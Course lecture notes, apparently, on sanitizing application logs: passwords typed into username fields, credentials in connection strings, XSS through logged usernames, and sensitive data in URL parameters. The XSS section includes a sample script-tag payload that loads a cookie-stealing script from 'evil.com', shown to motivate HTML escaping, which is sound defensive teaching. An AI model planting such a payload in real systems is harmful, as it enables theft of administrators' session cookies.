Main Content
Ep-2: Log Sanitization
Intro
- Question that we’ll investigate
- “What items should I sanitize from the application logs?”
- More than just passwords :)
Recon Background
- Physical Recon (Reconnaissance)
- Social Engineering: The Art of Human Hacking
- “I cant wait to jump in the dumpster!”
- Rushed employees don’t shred documents
- Application Logs
- Application’s dumpster
- Common attack target
- Rushed Devs/DevOps engineers dont “shred” sensitive information
Username Issues
- User accidentally enters their password into the username field
- Log view
- “Username ronaldmcdonaldPassword123 doesn’t exist”
- “Username ronaldmcdonald logged in successfully”
- Sanitize all usernames from logs?
- No
- Incident Response
- Find trade-off
Username Issues (Solution)
- Possible solution
- Server-side validation
- If server receives a username with no password
- Abort the request
- Dont log the username
- Log IP for bot/DoS activity
- Client-side validation as well
Sanitize Logs For Credentials
- User’s password within a form
POST
- Connection strings with basic authentication
- DB connection strings
- Log View: “Connection to
https://dbUser:[email protected]
succeeded”
- Fix
- Setup logging middleware that sanitizes basic auth
- Regex
//:ANYTHING:ANYTHING@
- Build script output
Sanitize Logs For XSS
- What is XSS (Cross Site Scripting)?
- Ex: Attacker places malicious javascript in victim’s browser
- How can the logs be an XSS risk?
- Malicious guy signs up for a service with the username of
<script src="evil.com/authCookieStealer.js"></script>
- Log gets sent to admin UI
- Log View
Username <script src="evil.com/authCookieStealer.js"></script> logged in
- Admin views the logs
- Admin’s browser interprets HTML and loads
authCookieStealer.js
Sanitize Logs For XSS (Solution)
- XSS filter before persisting to logs
- Escape All HTML special characters before logging
XSS
node.js module (and cli tool)
- Can escape all html tags or a tag whitelist
script
tag escaping
- Recommendations
- For logs, nothing should be in whitelist
- For auditing, escape instead of removing tags
Sanitize Logs For Sensitive Url Parameters
- SSNs or other personally identifiable information
- Health conditions
- Check compliance
- Often logs are stored unencrypted, this could violate HIPAA
- Auth Cookies
- Certain frameworks will automatically put sessionids (auth information) in url parameters if cookies are turned off
- Session Tracking
- nginx considerations
Additional Resources
Complete and Continue
0 comments